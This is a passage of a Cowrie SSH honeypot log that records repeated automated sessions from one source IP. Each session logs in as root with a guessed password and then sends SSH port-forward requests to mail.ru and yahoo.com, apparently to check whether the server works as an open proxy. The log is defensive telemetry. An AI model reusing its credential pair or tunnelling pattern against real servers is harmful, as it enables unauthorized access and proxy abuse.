our128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.599490Z","src_ip":"77.83.207.83","session":"5457fc214c74"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.847985Z","src_ip":"77.83.207.83","session":"5457fc214c74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28445,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:28445","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.899148Z","session":"5457fc214c74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.948993Z","src_ip":"77.83.207.83","session":"5457fc214c74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2018,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2018","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.092508Z","session":"5457fc214c74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.142514Z","src_ip":"77.83.207.83","session":"5457fc214c74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":26863,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26863","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.284134Z","session":"5457fc214c74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.334359Z","src_ip":"77.83.207.83","session":"5457fc214c74"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.384768Z","src_ip":"77.83.207.83","session":"5457fc214c74"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57080,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcf2d739496a","protocol":"ssh","message":"New connection: 77.83.207.83:57080 (1.2.3.4:22) [session: fcf2d739496a]","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.434865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.444895Z","src_ip":"77.83.207.83","session":"fcf2d739496a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.485647Z","src_ip":"77.83.207.83","session":"fcf2d739496a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.736721Z","src_ip":"77.83.207.83","session":"fcf2d739496a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20022,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20022","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.787898Z","session":"fcf2d739496a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.838527Z","src_ip":"77.83.207.83","session":"fcf2d739496a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":25731,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:25731","sensor":"my-vps","timestamp":"2025-08-31T03:46:43.980758Z","session":"fcf2d739496a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.031330Z","src_ip":"77.83.207.83","session":"fcf2d739496a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":31485,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31485","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.172688Z","session":"fcf2d739496a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.223273Z","src_ip":"77.83.207.83","session":"fcf2d739496a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.274529Z","src_ip":"77.83.207.83","session":"fcf2d739496a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57168,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fbdf1d6d352","protocol":"ssh","message":"New connection: 77.83.207.83:57168 (1.2.3.4:22) [session: 3fbdf1d6d352]","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.323704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.333600Z","src_ip":"77.83.207.83","session":"3fbdf1d6d352"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.374263Z","src_ip":"77.83.207.83","session":"3fbdf1d6d352"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.625335Z","src_ip":"77.83.207.83","session":"3fbdf1d6d352"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5510,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:5510","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.676437Z","session":"3fbdf1d6d352"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.726801Z","src_ip":"77.83.207.83","session":"3fbdf1d6d352"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3929,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3929","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.868709Z","session":"3fbdf1d6d352"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:44.919140Z","src_ip":"77.83.207.83","session":"3fbdf1d6d352"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":14167,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:14167","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.061051Z","session":"3fbdf1d6d352"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.111829Z","src_ip":"77.83.207.83","session":"3fbdf1d6d352"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.163469Z","src_ip":"77.83.207.83","session":"3fbdf1d6d352"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57248,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa58716ccaa2","protocol":"ssh","message":"New connection: 77.83.207.83:57248 (1.2.3.4:22) [session: aa58716ccaa2]","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.213092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.213939Z","src_ip":"77.83.207.83","session":"aa58716ccaa2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.265469Z","src_ip":"77.83.207.83","session":"aa58716ccaa2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.519032Z","src_ip":"77.83.207.83","session":"aa58716ccaa2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23511,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23511","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.570805Z","session":"aa58716ccaa2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.621752Z","src_ip":"77.83.207.83","session":"aa58716ccaa2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10755,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:10755","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.765360Z","session":"aa58716ccaa2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.816459Z","src_ip":"77.83.207.83","session":"aa58716ccaa2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":9471,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:9471","sensor":"my-vps","timestamp":"2025-08-31T03:46:45.961130Z","session":"aa58716ccaa2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.012295Z","src_ip":"77.83.207.83","session":"aa58716ccaa2"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.064174Z","src_ip":"77.83.207.83","session":"aa58716ccaa2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57316,"dst_ip":"1.2.3.4","dst_port":22,"session":"19174fd53ca6","protocol":"ssh","message":"New connection: 77.83.207.83:57316 (1.2.3.4:22) [session: 19174fd53ca6]","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.113228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.113954Z","src_ip":"77.83.207.83","session":"19174fd53ca6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.164023Z","src_ip":"77.83.207.83","session":"19174fd53ca6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.413541Z","src_ip":"77.83.207.83","session":"19174fd53ca6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23411,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23411","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.464302Z","session":"19174fd53ca6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.515028Z","src_ip":"77.83.207.83","session":"19174fd53ca6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":30250,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:30250","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.656517Z","session":"19174fd53ca6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.706651Z","src_ip":"77.83.207.83","session":"19174fd53ca6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":20708,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20708","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.848299Z","session":"19174fd53ca6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.898333Z","src_ip":"77.83.207.83","session":"19174fd53ca6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.949291Z","src_ip":"77.83.207.83","session":"19174fd53ca6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57394,"dst_ip":"1.2.3.4","dst_port":22,"session":"af837eb72ef9","protocol":"ssh","message":"New connection: 77.83.207.83:57394 (1.2.3.4:22) [session: af837eb72ef9]","sensor":"my-vps","timestamp":"2025-08-31T03:46:46.999099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:47.009541Z","src_ip":"77.83.207.83","session":"af837eb72ef9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sh